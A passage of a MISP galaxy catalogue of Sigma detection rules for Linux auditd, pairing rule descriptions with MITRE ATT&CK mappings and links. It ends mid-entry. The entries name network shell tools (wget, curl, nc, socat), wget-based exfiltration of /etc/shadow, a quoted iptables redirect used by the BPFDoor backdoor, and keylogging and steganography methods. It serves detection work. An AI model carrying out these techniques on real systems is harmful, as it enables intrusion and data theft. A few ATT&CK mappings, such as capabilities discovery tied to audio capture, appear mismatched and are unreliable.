The tag is: misp-galaxy:sigma-rules="Cleartext Protocol Usage Via Netflow"

Table 11489. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite.

The tag is: misp-galaxy:sigma-rules="OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd"

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11490. Table References

Links

https://github.com/Azure/Azure-Sentinel/pull/3059

https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml

Use Of Hidden Paths Or Files

Detects calls to hidden files or files located in hidden directories in NIX systems.

The tag is: misp-galaxy:sigma-rules="Use Of Hidden Paths Or Files"

Use Of Hidden Paths Or Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 11491. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml

File or Folder Permissions Change

Detects file and folder permission changes.

The tag is: misp-galaxy:sigma-rules="File or Folder Permissions Change"

File or Folder Permissions Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11492. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml

Logging Configuration Changes on Linux Host

Detect changes of syslog daemons configuration files

The tag is: misp-galaxy:sigma-rules="Logging Configuration Changes on Linux Host"

Logging Configuration Changes on Linux Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11493. Table References

Links

self experience[self experience]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml

Systemd Service Creation

Detects a creation of systemd services which could be used by adversaries to execute malicious code.

The tag is: misp-galaxy:sigma-rules="Systemd Service Creation"

Systemd Service Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

Table 11494. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml

BPFDoor Abnormal Process ID or Lock File Accessed

detects BPFDoor .lock and .pid files access in temporary file storage facility

The tag is: misp-galaxy:sigma-rules="BPFDoor Abnormal Process ID or Lock File Accessed"

BPFDoor Abnormal Process ID or Lock File Accessed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11495. Table References

Links

https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml

Audio Capture

Detects attempts to record audio with arecord utility

The tag is: misp-galaxy:sigma-rules="Audio Capture"

Audio Capture has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 11496. Table References

Links

https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa

https://linux.die.net/man/1/arecord

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml

Credentials In Files - Linux

Detecting attempts to extract passwords with grep

The tag is: misp-galaxy:sigma-rules="Credentials In Files - Linux"

Credentials In Files - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11497. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml

Binary Padding - Linux

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.

The tag is: misp-galaxy:sigma-rules="Binary Padding - Linux"

Binary Padding - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

Table 11498. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml

Steganography Hide Files with Steghide

Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

The tag is: misp-galaxy:sigma-rules="Steganography Hide Files with Steghide"

Steganography Hide Files with Steghide has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11499. Table References

Links

https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml

System Owner or User Discovery

Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:sigma-rules="System Owner or User Discovery"

System Owner or User Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 11500. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml

Suspicious C2 Activities

Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)

The tag is: misp-galaxy:sigma-rules="Suspicious C2 Activities"

Table 11501. Table References

Links

https://github.com/Neo23x0/auditd

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml

Clipboard Collection with Xclip Tool - Auditd

Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection with Xclip Tool - Auditd"

Clipboard Collection with Xclip Tool - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11502. Table References

Links

https://linux.die.net/man/1/xclip

https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml

Steganography Extract Files with Steghide

Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.

The tag is: misp-galaxy:sigma-rules="Steganography Extract Files with Steghide"

Steganography Extract Files with Steghide has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11503. Table References

Links

https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml

Loading of Kernel Module via Insmod

Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.

The tag is: misp-galaxy:sigma-rules="Loading of Kernel Module via Insmod"

Loading of Kernel Module via Insmod has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1547.006" with estimative-language:likelihood-probability="almost-certain"

Table 11504. Table References

Links

https://linux.die.net/man/8/insmod

https://man7.org/linux/man-pages/man8/kmod.8.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml

Webshell Remote Command Execution

Detects possible command execution by web application/web shell

The tag is: misp-galaxy:sigma-rules="Webshell Remote Command Execution"

Webshell Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11505. Table References

Links

Personal Experience of the Author[Personal Experience of the Author]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml

Unix Shell Configuration Modification

Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.

The tag is: misp-galaxy:sigma-rules="Unix Shell Configuration Modification"

Unix Shell Configuration Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Unix Shell Configuration Modification - T1546.004" with estimative-language:likelihood-probability="almost-certain"

Table 11506. Table References

Links

https://www.glitch-cat.com/p/green-lambert-and-attack

https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat

https://objective-see.org/blog/blog_0x68.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml

Screen Capture with Import Tool

Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed.

The tag is: misp-galaxy:sigma-rules="Screen Capture with Import Tool"

Screen Capture with Import Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11507. Table References

Links

https://imagemagick.org/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md

https://linux.die.net/man/1/import

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml

Disable System Firewall

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

The tag is: misp-galaxy:sigma-rules="Disable System Firewall"

Disable System Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11508. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md

https://firewalld.org/documentation/man-pages/firewall-cmd.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml

Steganography Unzip Hidden Information From Picture File

Detects extracting of zip file from image file

The tag is: misp-galaxy:sigma-rules="Steganography Unzip Hidden Information From Picture File"

Steganography Unzip Hidden Information From Picture File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11509. Table References

Links

https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml

Linux Capabilities Discovery

Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.

The tag is: misp-galaxy:sigma-rules="Linux Capabilities Discovery"

Linux Capabilities Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 11510. Table References

Links

https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099

https://man7.org/linux/man-pages/man8/getcap.8.html

https://mn3m.info/posts/suid-vs-capabilities/

https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml

System and Hardware Information Discovery

Detects system information discovery commands

The tag is: misp-galaxy:sigma-rules="System and Hardware Information Discovery"

System and Hardware Information Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11511. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml

Modify System Firewall

Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.

The tag is: misp-galaxy:sigma-rules="Modify System Firewall"

Modify System Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11512. Table References

Links

https://blog.aquasec.com/container-security-tnt-container-attack

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml

Auditing Configuration Changes on Linux Host

Detect changes in auditd configuration files

The tag is: misp-galaxy:sigma-rules="Auditing Configuration Changes on Linux Host"

Auditing Configuration Changes on Linux Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1562.006" with estimative-language:likelihood-probability="almost-certain"

Table 11513. Table References

Links

Self Experience[Self Experience]

https://github.com/Neo23x0/auditd/blob/master/audit.rules

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml

Modification of ld.so.preload

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

The tag is: misp-galaxy:sigma-rules="Modification of ld.so.preload"

Modification of ld.so.preload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006" with estimative-language:likelihood-probability="almost-certain"

Table 11514. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml

Masquerading as Linux Crond Process

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

The tag is: misp-galaxy:sigma-rules="Masquerading as Linux Crond Process"

Masquerading as Linux Crond Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11515. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml

Steganography Hide Zip Information in Picture File

Detects appending of zip file to image

The tag is: misp-galaxy:sigma-rules="Steganography Hide Zip Information in Picture File"

Steganography Hide Zip Information in Picture File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 11516. Table References

Links

https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml

Suspicious History File Operations - Linux

Detects commandline operations on shell history files

The tag is: misp-galaxy:sigma-rules="Suspicious History File Operations - Linux"

Suspicious History File Operations - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 11517. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml

File Time Attribute Change - Linux

Detect file time attribute change to hide new or changes to existing files.

The tag is: misp-galaxy:sigma-rules="File Time Attribute Change - Linux"

File Time Attribute Change - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 11518. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml

Possible Coin Miner CPU Priority Param

Detects command line parameter very often used with coin miners

The tag is: misp-galaxy:sigma-rules="Possible Coin Miner CPU Priority Param"

Possible Coin Miner CPU Priority Param has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 11519. Table References

Links

https://xmrig.com/docs/miner/command-line-options

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml

Network Sniffing - Linux

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

The tag is: misp-galaxy:sigma-rules="Network Sniffing - Linux"

Network Sniffing - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 11520. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml

Data Exfiltration with Wget

Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.

The tag is: misp-galaxy:sigma-rules="Data Exfiltration with Wget"

Data Exfiltration with Wget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 11521. Table References

Links

https://gtfobins.github.io/gtfobins/wget/

https://linux.die.net/man/1/wget

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml

Systemd Service Reload or Start

Detects a reload or a start of a service.

The tag is: misp-galaxy:sigma-rules="Systemd Service Reload or Start"

Systemd Service Reload or Start has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"

Table 11522. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml

Split A File Into Pieces - Linux

Detection use of the command "split" to split files into parts and possible transfer.

The tag is: misp-galaxy:sigma-rules="Split A File Into Pieces - Linux"

Split A File Into Pieces - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"

Table 11523. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml

Clipboard Collection of Image Data with Xclip Tool

Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.

The tag is: misp-galaxy:sigma-rules="Clipboard Collection of Image Data with Xclip Tool"

Clipboard Collection of Image Data with Xclip Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 11524. Table References

Links

https://linux.die.net/man/1/xclip

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml

Bpfdoor TCP Ports Redirect

All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.

The tag is: misp-galaxy:sigma-rules="Bpfdoor TCP Ports Redirect"

Bpfdoor TCP Ports Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11525. Table References

Links

https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml

Program Executions in Suspicious Folders

Detects program executions in suspicious non-program folders related to malware or hacking activity

The tag is: misp-galaxy:sigma-rules="Program Executions in Suspicious Folders"

Program Executions in Suspicious Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

Table 11526. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml

Remove Immutable File Attribute - Auditd

Detects removing immutable file attribute.

The tag is: misp-galaxy:sigma-rules="Remove Immutable File Attribute - Auditd"

Remove Immutable File Attribute - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

Table 11527. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml

Data Compressed

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Data Compressed"

Data Compressed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 11528. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

The tag is: misp-galaxy:sigma-rules="Linux Network Service Scanning - Auditd"

Linux Network Service Scanning - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 11529. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml

Screen Capture with Xwd

Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations

The tag is: misp-galaxy:sigma-rules="Screen Capture with Xwd"

Screen Capture with Xwd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 11530. Table References

Links

https://linux.die.net/man/1/xwd

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml

System Shutdown/Reboot - Linux

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.

The tag is: misp-galaxy:sigma-rules="System Shutdown/Reboot - Linux"

System Shutdown/Reboot - Linux has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

Table 11531. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml

Password Policy Discovery

Detects password policy discovery commands

The tag is: misp-galaxy:sigma-rules="Password Policy Discovery"

Password Policy Discovery has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 11532. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md

https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu

https://man7.org/linux/man-pages/man1/passwd.1.html

https://linux.die.net/man/1/chage

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml

System Information Discovery - Auditd

Detects System Information Discovery commands

The tag is: misp-galaxy:sigma-rules="System Information Discovery - Auditd"

System Information Discovery - Auditd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11533. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml

Overwriting the File with Dev Zero or Null

Detects overwriting (effectively wiping/deleting) of a file.

The tag is: misp-galaxy:sigma-rules="Overwriting the File with Dev Zero or Null"

Overwriting the File with Dev Zero or Null has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11534. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml

Linux Keylogging with Pam.d

Detect attempt to enable auditing of TTY input

The tag is: misp-galaxy:sigma-rules="Linux Keylogging with Pam.d"

Linux Keylogging with Pam.d has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 11535. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md

https://access.redhat.com/articles/4409591#audit-record-types-2

https://linux.die.net/man/8/pam_tty_audit

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing

https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml

Suspicious Commands Linux

Detects relevant commands often related to malware or hacking activity

The tag is: misp-galaxy:sigma-rules="Suspicious Commands Linux"

Suspicious Commands Linux has relationships with:

